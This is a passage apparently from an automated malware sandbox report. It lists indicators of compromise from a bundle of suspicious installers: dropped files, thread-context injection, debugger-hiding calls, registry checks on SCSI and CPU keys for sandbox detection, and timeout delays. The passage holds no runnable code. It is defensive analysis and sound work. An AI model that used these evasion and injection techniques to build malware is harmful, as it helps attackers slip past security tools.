C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF C247.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\A9WDFGBV.cookie svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{19f360f3-29d0-4342-866b-a0047a4cbf3f}\SET2A6C.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{19f360f3-29d0-4342-866b-a0047a4cbf3f}\SET2A6D.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{19f360f3-29d0-4342-866b-a0047a4cbf3f}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{19f360f3-29d0-4342-866b-a0047a4cbf3f}\tap0901.sys DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
mask_svc.exemask_svc.exemask_svc.exepid process 6220 mask_svc.exe 6360 mask_svc.exe 4596 mask_svc.exe -
Suspicious use of SetThreadContext 22 IoCs
Processes:
svchost.exetoolspab1.exeloli.exetoolspab1.exe1.exe2.exelilalmix.exe1302260226.exeEB21.exeConhost.exeF43F.tmp.exe764823507.exe1.exe2.exe1.exe2.exe1.exe2.exe1.exe2.exedescription pid process target process PID 484 set thread context of 4372 484 svchost.exe svchost.exe PID 6120 set thread context of 5736 6120 toolspab1.exe toolspab1.exe PID 736 set thread context of 6272 736 loli.exe loli.exe PID 5732 set thread context of 6420 5732 toolspab1.exe toolspab1.exe PID 6428 set thread context of 7068 6428 1.exe 1.exe PID 5144 set thread context of 7148 5144 2.exe 2.exe PID 4000 set thread context of 5220 4000 lilalmix.exe lilalmix.exe PID 7564 set thread context of 7944 7564 1302260226.exe AddInProcess32.exe PID 7152 set thread context of 7820 7152 EB21.exe EB21.exe PID 7480 set thread context of 7648 7480 Conhost.exe msiexec.exe PID 7480 set thread context of 4572 7480 Conhost.exe msiexec.exe PID 7348 set thread context of 892 7348 F43F.tmp.exe msiexec.exe PID 7348 set thread context of 8484 7348 F43F.tmp.exe Weather.exe PID 7952 set thread context of 9424 7952 764823507.exe 764823507.exe PID 9544 set thread context of 8732 9544 1.exe 1.exe PID 9912 set thread context of 9140 9912 2.exe 2.exe PID 8428 set thread context of 8740 8428 1.exe 1.exe PID 7868 set thread context of 8300 7868 2.exe 2.exe PID 6688 set thread context of 8920 6688 1.exe 1.exe PID 8 set thread context of 4144 8 2.exe 2.exe PID 5012 set thread context of 8668 5012 1.exe 1.exe PID 10016 set thread context of 10236 10016 2.exe 2.exe -
Drops file in Program Files directory 64 IoCs
Processes:
vpn.tmpsetup_10.2_mix.exe29DEA0BA258723098A514297F4C4D0B7.exevict.tmplxsajuyiswe.tmpIBInstaller_97039.tmpprolab.tmpirecord.tmpppppppfy.exesetup_10.2_mix.exeguihuali-game.exevict.tmpjg7_7wjg.exe22.exevict.tmpMicrosoft.exedescription ioc process File created C:\Program Files (x86)\MaskVPN\is-3RI97.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-UF70B.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_3_pressed.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe 29DEA0BA258723098A514297F4C4D0B7.exe File created C:\Program Files (x86)\viewerise\is-8SA7N.tmp vict.tmp File created C:\Program Files (x86)\MaskVPN\is-9TUB5.tmp vpn.tmp File opened for modification C:\Program Files (x86)\viewerise\WeriseTweaker.exe lxsajuyiswe.tmp File created C:\Program Files (x86)\Install engine 16\is-U1IQO.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\polstore.dll vpn.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_1_pressed.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Picture Lab\unins000.dat prolab.tmp File created C:\Program Files (x86)\I-record\is-F2IRC.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Picture Lab\Pictures Lab.exe prolab.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-5POH8.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\lang\de-De.xml setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Wesaezhebaecy.exe.config ppppppfy.exe File created C:\Program Files (x86)\I-record\is-9PJNV.tmp irecord.tmp File opened for modification C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\Picture Lab\is-8EBNE.tmp prolab.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_3_pressed.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_2_normal.png setup_10.2_mix.exe File created C:\Program Files (x86)\Picture Lab\is-03QOA.tmp prolab.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_1_hover.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Picture Lab\DockingToolbar.dll prolab.tmp File opened for modification C:\Program Files (x86)\I-record\LinqBridge.dll irecord.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-OEDPN.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_1_normal.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\I-record\Bunifu_UI_v1.52.dll irecord.tmp File created C:\Program Files (x86)\viewerise\is-1MKCB.tmp lxsajuyiswe.tmp File created C:\Program Files (x86)\MaskVPN\is-PJ7IP.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_3_hover.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Advanced Trip\TrayIcon1.ico setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_0_normal.png setup_10.2_mix.exe File created C:\Program Files\unins.vbs guihuali-game.exe File created C:\Program Files (x86)\Picture Lab\is-3IMCA.tmp prolab.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_4_pressed.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Advanced Trip\TrayIcon.ico File opened for modification C:\Program Files (x86)\Picture Lab\AForge.dll prolab.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_bg.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Advanced Trip\lang\de-De.xml setup_10.2_mix.exe File created C:\Program Files (x86)\viewerise\is-I9C4J.tmp vict.tmp File created C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\d.jfm jg7_7wjg.exe File created C:\Program Files\javcse\install.dll 22.exe File created C:\Program Files (x86)\Install engine 16\is-JMA4M.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\viewerise\is-090FJ.tmp vict.tmp File created C:\Program Files\Internet Explorer\XAESQHIXTP\irecord.exe Microsoft.exe File opened for modification C:\Program Files (x86)\I-record\postproc-52.dll irecord.tmp File created C:\Program Files (x86)\MaskVPN\is-48L7L.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-FOJRG.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-SRB92.tmp vpn.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe 29DEA0BA258723098A514297F4C4D0B7.exe File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe 29DEA0BA258723098A514297F4C4D0B7.exe File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-K05D6.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-P9CDR.tmp vpn.tmp File opened for modification C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\loli.exe 29DEA0BA258723098A514297F4C4D0B7.exe File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-CFP2Q.tmp vpn.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_bg.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\Advanced Trip\images\gadget_button_1_pressed.png setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll vpn.tmp File created C:\Program Files (x86)\Install engine 16\is-1S8OQ.tmp IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\Advanced Trip\TrayIcon2.ico setup_10.2_mix.exe File opened for modification C:\Program Files (x86)\viewerise\unins000.dat vict.tmp -
Drops file in Windows directory 45 IoCs
Processes:
expand.exemsiexec.exemultitimer.exeMicrosoftEdge.exeMicrosoftEdge.exeDrvInst.exeC247.exeMicrosoftEdge.exeaipackagechainer.execmd.exesvchost.exemultitimer.exemultitimer.exeMicrosoftEdge.exemultitimer.exetapinstall.exesvchost.exeWerFault.exeMicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI18B9.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI1D6E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI238B.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI1EF6.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2B5C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3011.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log C247.exe File created C:\Windows\INF\oem2.PNF C247.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Tasks\.job aipackagechainer.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File created C:\Windows\Installer\f751677.msi msiexec.exe File opened for modification C:\Windows\Installer\f751677.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI2196.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI2C39.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI2D63.tmp msiexec.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new cmd.exe File opened for modification C:\Windows\Installer\MSI1BA8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3043.tmp msiexec.exe File opened for modification C:\Windows\Tasks\.job svchost.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\Installer\MSI2BBB.tmp msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new cmd.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 12 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 6720 3104 WerFault.exe RunWW.exe 7000 3104 WerFault.exe RunWW.exe 3816 3104 WerFault.exe RunWW.exe 7036 3104 WerFault.exe RunWW.exe 4612 3104 WerFault.exe RunWW.exe 6224 3104 WerFault.exe RunWW.exe 1372 3104 WerFault.exe RunWW.exe 6288 3104 WerFault.exe RunWW.exe 6508 3104 WerFault.exe RunWW.exe 8168 4728 WerFault.exe MicrosoftEdgeCP.exe 804 5228 WerFault.exe win1host.exe 8492 2784 WerFault.exe MicrosoftEdgeCP.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
C247.exesvchost.exetapinstall.exesvchost.exeDrvInst.exetoolspab1.exetapinstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters C247.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters C247.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\UpperFilters C247.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities svchost.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exeloli.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 loli.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString loli.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe -
Delays execution with timeout.exe 8 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 8004 timeout.exe 4764 timeout.exe 1172 timeout.exe 5676 timeout.exe 8976 timeout.exe 7020 timeout.exe 10112 timeout.exe 6764 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
multitimer.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Kills process with taskkill 9 IoCs
Processes:
